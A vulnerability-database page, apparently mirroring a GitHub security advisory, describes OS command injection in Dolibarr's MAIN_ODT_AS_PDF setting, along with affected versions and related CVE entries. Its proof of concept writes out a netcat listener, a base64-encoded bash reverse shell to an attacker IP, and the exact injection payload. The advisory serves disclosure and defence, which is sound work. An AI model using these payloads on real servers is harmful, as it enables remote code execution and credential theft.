Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-w5j3-8fcr-h87w

Опубликовано: 17 апр. 2026
Источник: github
Github: Прошло ревью
CVSS4: 9.4
CVSS3: 9.1

Описание

Dolibarr: OS Command Injection (RCE) via MAIN_ODT_AS_PDF configuration

Summary

An authenticated administrator can execute arbitrary operating system commands by injecting a malicious payload into the MAIN_ODT_AS_PDF configuration constant. This vulnerability exists because the application fails to properly validate or escape the command path before passing it to the exec() function in the ODT to PDF conversion process.

Details

The vulnerability is located in htdocs/includes/odtphp/odf.php. When the system tries to convert an ODT document to PDF (e.g., in Proposals, Invoices), it constructs a shell command using the MAIN_ODT_AS_PDF global setting.

Code snippet (htdocs/includes/odtphp/odf.php, approx line 930):

$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name); // ... exec($command, $output_arr, $retval);

While the filename $name is sanitized using escapeshellcmd(), the configuration variable MAIN_ODT_AS_PDF is retrieved directly from the database and concatenated at the beginning of the string. An attacker with administrative privileges can set this variable to include a command separator (like ;) followed by arbitrary commands.

PoC

Prerequisites:

  1. Login as an Administrator.
  2. Ensure the "Commercial Proposals" module is enabled and "ODT templates" are activated in its setup.

Steps to reproduce (Reverse Shell):

  1. Start a netcat listener on the attacker's machine (IP: 172.26.0.1, Port: 4445):
nc -lvnp 4445
  1. Prepare the payload. To avoid issues with special characters (like & or >) being escaped by the web application or shell, encode the reverse shell command in Base64:

    # Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1' echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64 # Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK
  2. Navigate to Home -> Setup -> Other Setup.

  3. Add or modify the constant MAIN_ODT_AS_PDF with the following injection payload:

    jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash

    (Explanation: jodconverter satisfies the initial check, ; acts as a command separator, and the pipeline decodes and executes the Base64 payload).

    image
  4. Navigate to Commerce -> New proposal, create a draft, select an ODT template (e.g., generic_proposal_odt), and click Generate.

    image
image image
  1. Check the netcat listener. A connection will be established, granting a shell on the server:
image

Impact

Remote Code Execution (RCE). An attacker who gains access to an administrator account (or a malicious administrator) can execute arbitrary commands on the underlying server with the privileges of the web server user (typically www-data). This allows for:

  • Reading sensitive configuration files (database credentials).
  • Modifying application code.
  • Full system compromise depending on server configuration (e.g., docker escape, pivoting).

Credits

Reported by Łukasz Rybak

Пакеты

Наименование

dolibarr/dolibarr

composer
Затронутые версииВерсия исправления

<= 22.0.4

Отсутствует

EPSS

Процентиль: 56%
0.00922
Низкий

9.4 Critical

CVSS4

9.1 Critical

CVSS3

Дефекты

CWE-78

Связанные уязвимости

CVSS3: 9.1
ubuntu
4 месяца назад

Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions prior to 23.0.0 , the ODT to PDF conversion process in odf.php concatenates the MAIN_ODT_AS_PDF configuration constant directly into a shell command passed to exec() without sanitization. An authenticated administrator can inject arbitrary OS commands via this constant using command separators, achieving remote code execution as the web server user when any ODT template is generated. This issue has been fixed in version 23.0.0.

CVSS3: 9.1
nvd
4 месяца назад

Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions prior to 23.0.0 , the ODT to PDF conversion process in odf.php concatenates the MAIN_ODT_AS_PDF configuration constant directly into a shell command passed to exec() without sanitization. An authenticated administrator can inject arbitrary OS commands via this constant using command separators, achieving remote code execution as the web server user when any ODT template is generated. This issue has been fixed in version 23.0.0.

CVSS3: 9.1
debian
4 месяца назад

Dolibarr is an enterprise resource planning (ERP) and customer relatio ...

EPSS

Процентиль: 56%
0.00922
Низкий

9.4 Critical

CVSS4

9.1 Critical

CVSS3

Дефекты

CWE-78